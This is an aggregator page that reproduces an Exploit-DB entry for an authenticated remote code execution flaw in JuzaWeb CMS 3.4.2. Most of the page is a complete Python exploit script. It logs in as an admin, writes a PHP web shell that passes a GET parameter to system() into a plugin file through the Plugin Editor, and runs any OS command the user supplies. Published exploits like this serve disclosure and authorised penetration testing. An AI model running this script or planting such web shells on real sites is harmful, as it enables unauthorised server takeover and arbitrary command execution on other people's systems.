Security News

Cybersecurity news aggregator

🔓
HIGH Vulnerabilities Exploit-DB

[webapps] JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution

JuzaWeb CMS 3.4.2 contains an authenticated remote code execution vulnerability where an attacker with admin credentials can inject a PHP web shell into a plugin file via the Plugin Editor, leading to arbitrary OS command execution. The article does not provide a CVSS score, a specific range of affected versions beyond the stated 3.4.2, a fixed version, or a recommended workaround.
Read Full Article →

This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution EDB-ID: 52518 CVE: N/A EDB Verified: Author: SARDORDEV02 Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-29 Vulnerable App: # Exploit Title: JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution # Date: 2026-01-10 # Exploit Author: Sardor Shoakbarov # Author GitHub: https://github.com/TheDeepOpc # Vendor Homepage: https://juzaweb.com/ # Software Link: https://github.com/juzaweb/ # CVE: N/A (Pending) import requests import argparse from bs4 import BeautifulSoup def run_exploit(): parser = argparse.ArgumentParser(description='JuzaWeb Authenticated RCE') # Setting up the exact syntax you requested parser.add_argument('-u', '--url', help='Target URL (e.g. http://127.0.0.1:8000)', required=True) parser.add_argument('-user', '--username', help='Admin Username/Email', required=True) parser.add_argument('-p', '--password', help='Admin Password', required=True) parser.add_argument('-cmd', '--command', help='OS Command to execute (e.g. "ls", "id")', required=True) args = parser.parse_args() target = args.url.rstrip('/') session = requests.Session() print(f"[*] Targeting: {target}") # Step 1: Login login_url = f"{target}/admin-cp/login" try: get_login = session.get(login_url) soup = BeautifulSoup(get_login.text, 'html.parser') token = soup.find('input', {'name': '_token'})['value'] login_data = { '_token': token, 'email': args.username, 'password': args.password } res = session.post(login_url, data=login_data) if "Dashboard" not in res.text: print("[-] Login failed. Check credentials.") return print("[+] Login Successful.") except Exception as e: print(f"[-] Error during login: {e}") return # Step 2: Inject Web Shell # Injecting system() into a plugin file as described in the report print("[*] Injecting payload into Plugin Editor...") editor_url = f"{target}/admin-cp/plugins/editor" shell_payload = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); die; } ?>" inject_data = { 'file': 'src/routes/api.php', # File to overwrite 'content': shell_payload, 'plugin': 'juzaweb/example' # Targeted plugin } session.post(editor_url, data=inject_data) # Step 3: Execute Command # Accessing the modified route to trigger the command print(f"[*] Executing command: {args.command}") exec_url = f"{target}/admin-cp/plugins?cmd={args.command}" response = session.get(exec_url) print("\n--- Output ---") print(response.text.strip()) print("--------------") if __name__ == "__main__": run_exploit() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.

Share this article